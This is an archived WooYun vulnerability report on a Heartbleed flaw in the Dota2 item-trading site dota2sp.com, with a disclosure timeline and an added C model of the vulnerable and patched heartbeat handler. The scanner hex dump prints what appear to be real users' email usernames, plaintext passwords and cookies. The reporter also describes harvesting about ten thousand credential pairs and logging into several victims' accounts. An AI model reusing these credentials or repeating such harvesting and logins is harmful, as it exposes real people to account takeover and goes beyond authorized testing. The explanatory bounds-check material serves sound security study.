WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------------- http://drop.zone.ci/
2016-01-27: Details sent to the vendor, awaiting vendor handling
2016-01-27: Vendor confirmed; details visible to the vendor only
2016-02-06: Details disclosed to core white hats and relevant domain experts
2016-02-16: Details disclosed to regular white hats
2016-02-26: Details disclosed to intern white hats
2016-03-10: Details disclosed to the public
Dota2 item trading market: sloppy operations leak usernames, passwords and cookies (10K+ account/password pairs harvested; deleted after testing)
RT. The main site of the Dota2 item trading market, http://www.dota2sp.com/, is vulnerable to Heartbleed and leaks usernames, passwords and cookies in plaintext... which could lead to further harm (e.g. using the leaked usernames/passwords as a dictionary against mainstream domestic sites... the accounts hold cash, weapons, equipment and so on... although I haven't played games in N years... so I can't make sense of it - -)

Heartbleed (心脏出血漏洞, also shortened to 心血漏洞) is a bug in the OpenSSL cryptographic library, first disclosed in April 2014. The library is widely used to implement the Transport Layer Security (TLS) protocol. Any instance built on a vulnerable OpenSSL, server or client, can be attacked. The cause is that the implementation of the TLS heartbeat extension did not properly validate its input (a missing bounds check) [3], hence the name, from "heartbeat" [4]. The bug is a buffer over-read [5]: more data can be read than should be allowed [6]. (reposted from Wikipedia)
As shown below... the test output first...
Scanning www.dota2sp.com on port 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 4757
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Server TLS version was 1.2
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 6F 6E 6E 65  ....#.......onne
  00e0: 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76  ction: Keep-Aliv
  00f0: 65 0D 0A 48 6F 73 74 3A 20 77 77 77 2E 64 6F 74  e..Host: www.dot
  0100: 61 32 73 70 2E 63 6F 6D 0D 0A 55 73 65 72 2D 41  a2sp.com..User-A
  0110: 67 65 6E 74 3A 4D 6F 7A 69 6C 6C 61 2F 35 2E 30  gent:Mozilla/5.0
  0120: 20 28 63 6F 6D 70 61 74 69 62 6C 65 3B 20 4D 53   (compatible; MS
  0130: 49 45 20 39 2E 30 3B 20 57 69 6E 64 6F 77 73 20  IE 9.0; Windows 
  0140: 4E 54 20 36 2E 31 3B 20 54 72 69 64 65 6E 74 2F  NT 6.1; Trident/
  0150: 35 2E 30 29 3B 20 33 36 30 53 70 69 64 65 72 0D  5.0); 360Spider.
  0160: 0A 0D 0A 5B 1C FB 9F 6A 25 1A A5 F9 85 24 B5 FE  ...[...j%....$..
  0170: 01 A1 4F 78 16 DD 63 32 5B 8F 60 00 F1 6B EE FC  ..Ox..c2[.`..k..
  0180: C4 53 68 99 85 D6 00 BA 51 3E EB 61 A7 C3 D6 D8  .Sh.....Q>.a....
  0190: 58 FB 3C 8B 9F 77 77 77 2D 66 6F 72 6D 2D 75 72  X.<..www-form-ur
  01a0: 6C 65 6E 63 6F 64 65 64 0D 0A 52 65 66 65 72 65  lencoded..Refere
  01b0: 72 3A 20 68 74 74 70 73 3A 2F 2F 77 77 77 2E 64  r: https://www.d
  01c0: 6F 74 61 32 73 70 2E 63 6F 6D 2F 73 73 6C 2F 6C  ota2sp.com/ssl/l
  01d0: 6F 67 69 6E 0D 0A 41 63 63 65 70 74 2D 45 6E 63  ogin..Accept-Enc
  01e0: 6F 64 69 6E 67 3A 20 67 7A 69 70 2C 20 64 65 66  oding: gzip, def
  01f0: 6C 61 74 65 0D 0A 41 63 63 65 70 74 2D 4C 61 6E  late..Accept-Lan
  0200: 67 75 61 67 65 3A 20 7A 68 2D 43 4E 2C 7A 68 3B  guage: zh-CN,zh;
  0210: 71 3D 30 2E 38 0D 0A 43 6F 6F 6B 69 65 3A 20 48  q=0.8..Cookie: H
  0220: 6D 5F 6C 76 74 5F 33 38 66 62 39 37 39 31 37 30  m_lvt_38fb979170
  0230: 35 38 37 61 66 65 62 30 37 63 35 65 30 65 35 39  587afeb07c5e0e59
  0240: 65 38 36 34 36 35 3D 31 34 35 33 38 35 39 36 36  e86465=145385966
  0250: 35 3B 20 48 6D 5F 6C 70 76 74 5F 33 38 66 62 39  5; Hm_lpvt_38fb9
  0260: 37 39 31 37 30 35 38 37 61 66 65 62 30 37 63 35  79170587afeb07c5
  0270: 65 30 65 35 39 65 38 36 34 36 35 3D 31 34 35 33  e0e59e86465=1453
  0280: 38 35 39 36 36 37 0D 0A 0D 0A 72 75 72 6C 3D 25  859667....rurl=%
  0290: 32 46 73 73 6C 25 32 46 6C 6F 67 69 6E 26 55 73  2Fssl%2Flogin&Us
  02a0: 65 72 4E 61 6D 65 3D 35 38 32 34 34 33 34 39 34  erName=582443494
  02b0: 25 34 30 71 71 2E 63 6F 6D 26 50 61 73 73 77 6F  %40qq.com&Passwo
  02c0: 72 64 3D 6E 69 61 6E 31 31 30 33 32 34 70 E6 2B  rd=nian110324p.+
  02d0: 7E 62 F4 1B 86 27 D3 10 02 0F 98 3A B7 34 37 32  ~b...'.....:.472
  02e0: 30 36 35 38 32 25 34 30 71 71 2E 63 6F 6D 26 50  06582%40qq.com&P
  02f0: 61 73 73 77 6F 72 64 3D 67 78 73 72 7A 31 32 33  assword=gxsrz123
  0300: 34 35 70 93 F4 AA EE 85 82 52 70 C2 82 BB 1B 92  45p......Rp.....
  0310: 0A 0F 64 3D 79 6C 6D 69 68 61 6E 67 69 36 21 9F  ..d=ylmihangi6!.
  0320: 67 EB 73 AD E7 29 D7 10 0F AC FD 96 C4 AD 4C EB  g.s..)........L.
  0330: 9D FC 79 16 6B 69 E8 99 66 22 B1 9C 5A B9 C2 A2  ..y.ki..f"..Z...
  0340: 58 C7 82 91 B7 C9 F7 2C 31 34 35 33 38 35 37 35  X......,14538575
  0350: 37 32 2C 31 34 35 33 38 35 39 32 37 34 3B 20 48  72,1453859274; H
  0360: 6D 5F 6C 70 76 74 5F 33 38 66 62 39 37 39 31 37  m_lpvt_38fb97917
  0370: 30 35 38 37 61 66 65 62 30 37 63 35 65 30 65 35  0587afeb07c5e0e5
  0380: 39 65 38 36 34 36 35 3D 31 34 35 33 38 35 39 32  9e86465=14538592
  0390: 39 31 0D 0A 0D 0A 72 75 72 6C 3D 25 32 46 6D 79  91....rurl=%2Fmy
  03a0: 74 72 61 64 65 73 26 55 73 65 72 4E 61 6D 65 3D  trades&UserName=
  03b0: 38 33 34 39 37 36 39 37 33 40 71 71 2E 63 6F 6D  834976973@qq.com
  03c0: 26 50 61 73 73 77 6F 72 64 3D 61 31 33 30 30 33  &Password=a13003
  03d0: 33 32 32 35 35 35 DB 07 E4 B3 BE 67 F0 26 A3 D2  322555.....g.&..
  03e0: 15 3B 0F D7 07 ED 9E 47 7A 02 05 05 05 05 05 05  .;.....Gz.......
  03f0: 57 21 DD 4C B2 5C 9B 32 84 15 AE A5 DB 68 F3 CD  W!.L.\.2.....h..
  0400: C3 D1 F7 83 CB FA 9B 21 F4 B7 21 9C C7 37 8A 68  .......!..!..7.h
  0410: 6E B8 DA 4C 67 DA A3 14 F8 94 F3 E7 E3 DA 18 F6  n..Lg...........
  0420: 71 5F AB 72 DF 57 E9 29 3D BD 76 16 AA 19 D4 81  q_.r.W.)=.v.....
  0430: 02 E7 0B 47 B6 1E A5 79 79 C6 D7 98 E7 8C 42 7E  ...G...yy.....B~
  0440: D8 48 0C 26 CF D1 D8 DE 5C 9B A0 4E C5 6C D7 36  .H.&....\..N.l.6
  0450: C4 16 B5 E3 29 55 FA C3 E7 62 B5 31 48 74 5C 21  ....)U...b.1Ht\!
  0460: A4 E4 5F A5 3E C1 0A 3A F7 15 CA C9 82 B5 1F C1  .._.>..:........
  0470: 96 96 5F 4D 85 87 64 00 C1 CC 88 54 9D 20 75 31  .._M..d....T. u1
  0480: 69 93 C7 2E 62 8E 35 73 83 D8 52 9A AF CA DD 16  i...b.5s..R.....
  0490: EC F8 DE 37 FA 21 3D BE EE CB D7 BF A1 3D 03 1D  ...7.!=......=..
  04a0: 19 21 DB AB 8B BD F2 87 5A 95 AB 67 BC C6 60 BD  .!......Z..g..`.
  04b0: 68 1B AF 03 15 5A 54 46 41 AB 72 7B 3C 81 95 28  h....ZTFA.r{<..(
  04c0: 8F D2 E3 C8 20 BE D3 0D DC 14 4E 5C C0 92 0D 27  .... .....N\...'
  ...
WARNING: server www.dota2sp.com returned more data than it should - server is vulnerable!
Harvested 10K account/password pairs in testing (vim has already removed the duplicate lines; a quick refresher: you have to sort first). The harvested credentials have been deleted.
Logged in to a few at random to check.
Fix the issue.... any gift?... After fixing... notify users to change their passwords.
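Added example (not part of the original report and not OpenSSL's source): the missing bounds check described in the Wikipedia excerpt above, modelled in C. A heartbeat record whose length field claims 48 bytes arrives with only 4 bytes on the wire; the vulnerable handler copies what the length field says and so echoes the login POST body that happens to sit next to the record in memory, exactly the pattern visible in the dump above, while the fixed handler applies the check from the April 2014 OpenSSL patch and discards the message. The record layout, the 64-byte "process memory" buffer and the credential string are constructed for the demonstration.

```c
/* Simplified model of the TLS heartbeat handler in OpenSSL 1.0.1 before 1.0.1g
 * (CVE-2014-0160), vulnerable and fixed side by side. Illustrative code, not
 * OpenSSL's; the record and the neighbouring memory are constructed below. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TLS1_HB_REQUEST  1
#define TLS1_HB_RESPONSE 2
#define HB_PADDING       16   /* RFC 6520 minimum padding */

/* The record as the handler sees it: a pointer into the read buffer plus the
 * number of bytes that actually arrived on the wire. */
typedef struct {
    const unsigned char *data;
    size_t length;
} record_t;

/* Big-endian 16-bit length field, like OpenSSL's n2s() macro. */
static uint16_t n2s(const unsigned char *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* HeartbeatResponse: type, echoed length field, `payload` bytes copied from
 * `pl`, then padding (zeros here; OpenSSL fills it with random bytes). */
static unsigned char *hb_build_response(const unsigned char *pl, uint16_t payload, size_t *out_len) {
    size_t len = 1 + 2 + (size_t)payload + HB_PADDING;
    unsigned char *buf = malloc(len), *bp = buf;
    if (!buf) return NULL;
    *bp++ = TLS1_HB_RESPONSE;
    *bp++ = (unsigned char)(payload >> 8);
    *bp++ = (unsigned char)(payload & 0xff);
    memcpy(bp, pl, payload);              /* reads `payload` bytes from pl, whatever follows the record */
    memset(bp + payload, 0, HB_PADDING);
    *out_len = len;
    return buf;
}

/* VULNERABLE: the peer's length field is trusted. Nothing compares it with
 * rec->length, so memcpy walks past the record into adjacent heap memory. */
unsigned char *hb_process_vulnerable(const record_t *rec, size_t *out_len) {
    const unsigned char *p = rec->data;
    unsigned char hbtype = *p++;
    uint16_t payload = n2s(p);
    p += 2;
    if (hbtype != TLS1_HB_REQUEST) return NULL;
    return hb_build_response(p, payload, out_len);
}

/* FIXED (shape of the April 2014 patch): silently discard the message if the
 * record cannot hold header plus padding, or if the claimed payload does not
 * fit inside the bytes that actually arrived. */
unsigned char *hb_process_fixed(const record_t *rec, size_t *out_len) {
    if (rec->length < 1 + 2 + HB_PADDING) return NULL;
    const unsigned char *p = rec->data;
    unsigned char hbtype = *p++;
    uint16_t payload = n2s(p);
    p += 2;
    if (1 + 2 + (size_t)payload + HB_PADDING > rec->length) return NULL;
    if (hbtype != TLS1_HB_REQUEST) return NULL;
    return hb_build_response(p, payload, out_len);
}

/* Constructed "process memory": a 4-byte heartbeat record claiming a 48-byte
 * payload, immediately followed by a stale login request body. */
#define CLAIMED_PAYLOAD 48
static unsigned char g_mem[64];
static const char SECRET[] = "UserName=alice&Password=hunter2";   /* constructed, not real data */

static record_t build_record(void) {
    memset(g_mem, 0, sizeof g_mem);
    g_mem[0] = TLS1_HB_REQUEST;
    g_mem[1] = 0x00; g_mem[2] = CLAIMED_PAYLOAD;   /* length field says 48 */
    g_mem[3] = 'A';                                /* the only real payload byte */
    memcpy(g_mem + 4, SECRET, sizeof SECRET - 1);  /* what sits after the record */
    record_t rec = { g_mem, 4 };                   /* only 4 bytes arrived */
    return rec;
}

/* 1 if the vulnerable handler echoes the neighbouring secret back to the peer. */
int demo_vulnerable_leaks(void) {
    record_t rec = build_record();
    size_t n = 0;
    unsigned char *resp = hb_process_vulnerable(&rec, &n);
    int leaked = resp != NULL && n == 1 + 2 + CLAIMED_PAYLOAD + HB_PADDING &&
                 memcmp(resp + 4, SECRET, sizeof SECRET - 1) == 0;
    free(resp);
    return leaked;
}

/* 1 if the fixed handler drops the oversized claim yet still answers a
 * well-formed request whose length field matches the record. */
int demo_fixed_rejects(void) {
    record_t rec = build_record();
    size_t n = 0;
    unsigned char *resp = hb_process_fixed(&rec, &n);
    int rejected = (resp == NULL);
    unsigned char good[1 + 2 + 1 + HB_PADDING] = { TLS1_HB_REQUEST, 0x00, 0x01, 'A' };
    record_t good_rec = { good, sizeof good };
    resp = hb_process_fixed(&good_rec, &n);
    int echoed = resp != NULL && n == sizeof good && resp[0] == TLS1_HB_RESPONSE && resp[3] == 'A';
    free(resp);
    return rejected && echoed;
}

int main(void) {
    printf("vulnerable handler leaks secret: %s\n", demo_vulnerable_leaks() ? "yes" : "no");
    printf("fixed handler rejects request:   %s\n", demo_fixed_rejects() ? "yes" : "no");
    return 0;
}
```

This is also why the scanner's "returned more data than it should" heuristic works: the response length follows the attacker-controlled length field rather than the number of bytes the client actually sent, so a reply longer than the request is proof of the over-read without having to recognise anything in the leaked bytes.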
Severity: High
Vulnerability Rank: 10
Confirmed: 2016-01-27 21:05
Please contact customer service on QQ, thanks.
None